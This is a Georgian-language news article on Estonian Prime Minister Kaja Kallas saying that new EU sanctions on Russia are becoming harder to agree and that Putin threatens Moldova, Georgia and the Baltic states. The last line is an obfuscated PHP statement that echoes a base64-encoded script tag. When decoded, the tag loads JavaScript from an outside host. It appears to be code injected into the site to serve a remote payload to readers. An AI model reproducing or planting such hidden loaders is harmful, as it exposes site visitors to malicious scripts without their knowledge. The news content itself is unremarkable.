celsiusi
ავერსი საქკაბელი

ევროკავშირისთვის სულ უფრო რთული ხდება რუსეთის წინააღმდეგ სანქციების დაწესება, – ამის შესახებ განცხადება ესტონეთის პრემიერ-მინისტრმა ბრიტანულ „ტელეგრაფთან“ ინტერვიუში გააკეთა.

კაია კალასის განცხადებით, ამის მიზეზი ომისგან დაღლილობა და ის პრობლემებია, რომელებიც გამოაშკარავდა.

„ახლა დარჩენილია ძალიან ცოტა ისეთი ელემენტი, რომლის წინააღმდეგაც შეიძლება, დავაწესოთ სანქციები. ამაშია პრობლემა“, – ამბობს ესტონეთის პრემიერ-მინისტრი.

ამასთან, ესტონეთის მთავრობის მეთაური ამბობს, რომ რუსეთზე ზეწოლა უნდა შენარჩუნდეს, რათა მან სხვა ქვეყნების დაპყრობაც არ გადაწყვიტოს.

„უკრაინის შემდეგ პუტინმა თვალი დაადგა მოლდოვას, მიზანში ამოიღო საქართველო, ბალტიისპირეთის ქვეყნები. პუტინს ეს არასდროს დაუმალავს. ერთადერთი გზა მის შესაჩერებლად არის უკრაინის დახმარება, რომ ეს ომი მოიგოს“, – აცხადებს კაია კალასი.

კალასი ასევე ამბობს, რომ რუსეთს შეუძლია, ევროპის წინააღმდეგ გაჩაღებულ ჰიბრიდულ იარაღად გამოიყენოს რუსეთის ის მოქალაქეები, რომლებიც სამხედრო გაწვევისთვის თავის არიდების საბაბით ტოვებენ რუსეთს.

შეგახსენებთ, რომ ევროკავშირმა გასულ კვირას დააწესა რუსეთის წინააღმდეგ სანქციების ახალი პაკეტი.

475
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");